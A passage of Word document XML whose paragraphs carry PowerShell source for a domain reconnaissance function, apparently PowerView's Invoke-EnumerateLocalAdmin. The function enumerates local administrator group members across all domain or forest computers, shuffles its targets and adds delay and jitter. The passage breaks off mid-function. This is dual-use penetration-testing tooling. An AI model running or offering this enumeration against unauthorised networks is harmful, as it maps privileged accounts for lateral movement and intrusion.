    <w:p w14:paraId="76ED7F19" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1031DAF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="63A928F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Use API calls instead of the WinNT service provider. Less information,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9473C6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        but the results are faster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392A650C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A73496A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D428FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1D358F0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ABD224A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="34D93871" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C570C70" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0284DFCF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-EnumerateLocalAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8AC7BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D1D78B3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Enumerates the members of local administrators for all machines</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAC501C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        in the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5389F6FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6ED570A5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4F6C3F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3AF85B91" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-EnumerateLocalAdmin -Threads 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDA9BB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26C565E5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Threaded local admin enumeration, replaces Invoke-EnumerateLocalAdminThreaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE2B870" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7DCA8E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6BD2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2383D764" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        http://blog.harmj0y.net/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EAD6B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333C1DF2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2455A33C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463F1DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0942868D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58308BD7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59718EEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7484C913" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2522D9D6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="450BAB00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAC0B0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230A25A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED12C30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199910F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="202BCFC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCF0A84" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D34224" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="239D5744" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66298CAA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6306421A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0222D251" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB0C00" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303813AD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="72579CBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26250BDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7644EFA1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4DA9E53B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CBD816" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D7AB0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27C8A2B5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5716BB77" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $OutFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E22A989" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32CEB66D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F393C47" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoClobber,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CA50FA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="199150DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D7805A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $TrustGroups,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4463EFA3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="48ED0C44" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC748E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainOnly,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18103BFD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="41DA0891" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64876A3B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A03452E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A81D732" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522958B4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CCC6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="127B660A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23064B73" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43894EFF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="05A86CC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29619D21" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Int]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D5D37B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Threads,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461EDD04" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2911B94C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FE6018" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B93722" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3084F8F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="784F8E2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    begin {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F0DE62F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if ($PSBoundParameters['Debug']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344558A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $DebugPreference = 'Continue'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F927F61" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522D639C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="32533A6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # random object for delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF550DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $RandNo = New-Object System.Random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072C5CB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4BEDD34A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "[*] Running Invoke-EnumerateLocalAdmin with delay of $Delay"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCF8C8E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1E501927" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we're using a host list, read the targets in and add them to the target list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E1A07F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($ComputerFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D6EBDF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = Get-Content -Path $ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B23ABA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427CBD6C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="467BA1F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$ComputerName) { </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10015062" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            [array]$ComputerName = @()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D75764D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3E483260" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C174DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = @($Domain)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02AD93B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58087AF7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            elseif($SearchForest) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58624B5E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # get ALL the domains in the forest to search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF24CBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63769E3D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A1711C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D2F0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                # use the local domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118273BE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                $TargetDomains = @( (Get-NetDomain).name )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549F0315" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73462C45" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="661D45A1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            ForEach ($Domain in $TargetDomains) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C05275B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                Write-Verbose "[*] Querying domain $Domain for hosts"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC376D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $ComputerName += Get-NetComputer -Filter $ComputerFilter -ADSpath $ComputerADSpath -Domain $Domain -DomainController $DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B228F0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD94014" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7BFE48" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # remove any null target hosts, uniquify the list and shuffle it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED6E0C7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A1D38" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if($($ComputerName.Count) -eq 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BBFA89D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                throw "No hosts found!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72B45C82" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4DE064" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A604DE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="56157663" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # delete any existing output file if it already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106BA795" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if(!$NoClobber) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D08BD06" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($OutFile -and (Test-Path -Path $OutFile)) { Remove-Item -Path $OutFile }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23484402" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2665B661" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="27125CD0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        if($TrustGroups) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067F6C89" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6173767F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            Write-Verbose "Determining domain trust groups"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2595BEDB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7CC78D6E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            # find all group names that have one or more users in another domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E89A5CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            $TrustGroupNames = Find-ForeignGroup -Domain $Domain -DomainController $DomainController | ForEach-Object { $_.GroupName } | Sort-Object -Unique</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AA9897" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18ACC102" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            $TrustGroupsSIDs = $TrustGroupNames | ForEach-Object { </w:t>
      </w:r>
    </w:p>
